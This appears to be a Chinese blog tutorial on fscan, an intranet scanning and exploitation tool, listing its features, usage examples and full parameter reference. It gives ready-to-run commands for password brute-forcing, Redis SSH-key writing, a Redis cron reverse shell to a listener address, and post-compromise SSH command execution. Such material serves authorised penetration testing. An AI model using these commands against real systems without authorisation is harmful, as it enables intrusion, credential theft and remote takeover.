1.简介

Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

这款工具被红队广泛使用,它简直是内网横向移动的大杀器。

2.主要功能

(1)信息搜集:
    存活探测(icmp)
    端口扫描
(2)爆破功能:
    各类服务爆破(ssh、smb、rdp等)
    数据库密码爆破(mysql、mssql、redis、psql、oracle等)
(3)系统信息、漏洞扫描:
    netbios探测、域控识别
    获取目标网卡信息
    高危漏洞扫描(ms17010等)
(4)Web探测功能:
    webtitle探测
    web指纹识别(常见cms、oa框架等)
    web漏洞扫描(weblogic、st2等,支持xray的poc)
(5)漏洞利用:
    redis写公钥或写计划任务
    ssh命令执行

3.使用方法介绍

常用命令:(默认使用全部模块)
fscan.exe -h 192.168.1.1/24  (C段扫描)
fscan.exe -h 192.168.1.1/16  (B段扫描)
fscan.exe -h 192.168.1.1/8  (A段扫描,192.x.x.1和192.x.x.254,方便快速查看网段信息 )

其他:
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)

4.参数大全

Usage of fscan:
  -br int
        Brute threads (default 1)
  -c string
        exec command (ssh) //ssh命令执行
  -cookie string
        set poc cookie //设置cookie
  -debug int
        every time to LogErr (default 60) //多久没响应,就打印当前进度
  -domain string
        smb domain //smb爆破模块时,设置域名
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hf ip.txt
  -hn string
        the hosts no scan,as: -hn 192.168.1.1/24 //扫描时,要跳过的ip: -hn 192.168.1.1/24
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
        not to save output log //扫描结果不保存到文件中
  -nobr
        not to Brute password //跳过sql、ftp、ssh等的密码爆破
  -nopoc
        not to scan web vul //跳过web poc扫描
  -np
        not to ping //跳过存活探测
  -num int
        poc rate (default 20) //web poc 发包速率
  -o string
        Outputfile (default "result.txt") // 扫描结果保存到哪
  -p string
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
  -pa string
        add port base DefaultPorts,-pa 3389 //新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
  -path string
        fcgi、smb romote file path
  -ping
        using ping replace icmp
  -pn string
        the ports no scan,as: -pn 445 //扫描时要跳过的端口,as: -pn 445
  -pocname string
        use the pocs these contain pocname, -pocname weblogic //指定web poc的模糊名字, -pocname weblogic
  -pocpath string
        poc file path
  -portf string
        Port File
  -proxy string
        set poc proxy, -proxy http://127.0.0.1:8080 //设置代理, -proxy http://127.0.0.1:8080
  -pwd string
        password //指定爆破时的密码
  -pwda string
        add a password base DefaultPasses,-pwda password //在原有密码字典基础上,增加新密码
  -pwdf string
        password file //指定爆破时的密码文件
  -rf string
        redis file to write sshkey file (as: -rf id_rsa.pub) //指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666) //redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
  -silent
        silent scan // 静默扫描,适合cs扫描时不回显
  -sshkey string
        sshkey file (id_rsa) //ssh连接时,指定ssh私钥
  -t int
        Thread nums (default 600)
  -time int
        Set timeout (default 3) //端口扫描超时时间 (default 3)
  -top int
        show live len top (default 10)
  -u string
        url
  -uf string
        urlfile
  -user string
        username
  -usera string
        add a user base DefaultUsers,-usera user //在原有用户字典基础上,新增新用户
  -userf string
        username file
  -wt int
        Set web timeout (default 5)

内网渗透神器:fscan使用攻略相关推荐

  1. 忆享科技戟星安全实验室|内网渗透神器-Viper的基本使用

    戟星安全实验室 忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试.代码审计.应急响应.漏洞研究.威胁情报.安全运维.攻防演练等 本文约1200字,阅读约需4分钟. 0x00 介绍 vipe ...

  2. 内网渗透神器xerosploit

    项目地址:https://github.com/LionSec/xerosploit 安装完成后直接在终端输入xerosploit打开 显示了本机的内网ip,mac地址,网关,网卡,输入help查看帮 ...

  3. 红队内网渗透神器--CobaltStrike安装教程

    CobaltStrike介绍: CobaltStrike是一款渗透测试神器,被业界人称为CS神器.CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作 ...

  4. 内网渗透神器(Mimikatz)——使用教程

    项目地址:https://github.com/gentilkiwi/mimikatz/ 一.工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试, ...

  5. 内网渗透神器CobaltStrike之DNS Beacon(四)

    DNS隧道简介 利用DNS隧道进行攻击的现象已存在多年,将数据封装在DNS协议中传输,大部分防火墙和入侵检测设备很少会过滤DNS流量,僵尸网络和入侵攻击可几乎无限制地加以利用,实现诸如远控.文件传输等 ...

  6. 内网渗透神器CobaltStrike之钓鱼攻击(六)

    一.HTA木马 简介 HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件.HTA虽然用HTML.JS和CSS编写,却比普通网页权限大得多,它具有桌面 ...

  7. [原创]K8 cping 3.0大型内网渗透扫描工具

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介: 何为自定义扫描器?其实也是插件化,但 ...

  8. 【内网渗透工具】炫彩蛇安装教程

    点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...

  9. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

最新文章

  1. Vue从Hello World到打包(后端适读)
  2. 李艳芳北京应用物理与计算机,太赫兹量子级联激光器有源区增益分析和设计-太赫兹科学与电子信息.PDF...
  3. 如何打造千万级Feed流系统?阿里数据库技术解读
  4. android 动画动态消失,Android属性动画——没有什么动画是一个AnimSet不能解决的...
  5. shell编辑crontab任务
  6. matlab 线性规划求最大值,MATLAB求解线性规划(含整数规划和01规划)问题.pdf
  7. vue中 localStorage的使用方法(详解)
  8. 苹果笔记本装win7_小白“复活记”,十多年前的MacBook,曲折安装Win7
  9. MATLAB去重并排序-unique
  10. win服务器系统无法切换输入法,win8系统中文输入法切换不出来
  11. 简单高效的图片降噪方法
  12. 内网穿透软件对比——cpolar : 网云穿(下)
  13. GitLab分支介绍
  14. Word无法找到宏或宏被禁用如何解决
  15. ubuntu远程访问win7登录后语言为繁体字的解决办法
  16. 本地文件搜索引擎项目说明
  17. TypeError: unhashable type
  18. slambook2 ch3 Ubuntu18.04下运行和调试
  19. 1996届瑞安市计算机学校,1996届校友
  20. Python-读取并显示图片

热门文章

  1. 内存数据库应用之NBA篮球图文直播室存储设计(Redis版)
  2. 个性化学习推荐系统的设计与实现
  3. 通过实例学习Pytorch加载权重.load_state_dict()与保存权重.save()
  4. 一文解释电路中常用电子元器件应用和选型01
  5. 合天网安 第四周 | Check your source code
  6. 在虚拟机上使用SoftRoCE部署SPDK NVMe-oF
  7. 浅谈百度地图的简单开发再续前缘之公交,地铁路线检索查询(六)
  8. Linux配置本地yum源
  9. 【Linux】CentOS7 C#开发环境搭建笔记(Jexus安装、配置、部署)
  10. Gradle自定义AAR文件名称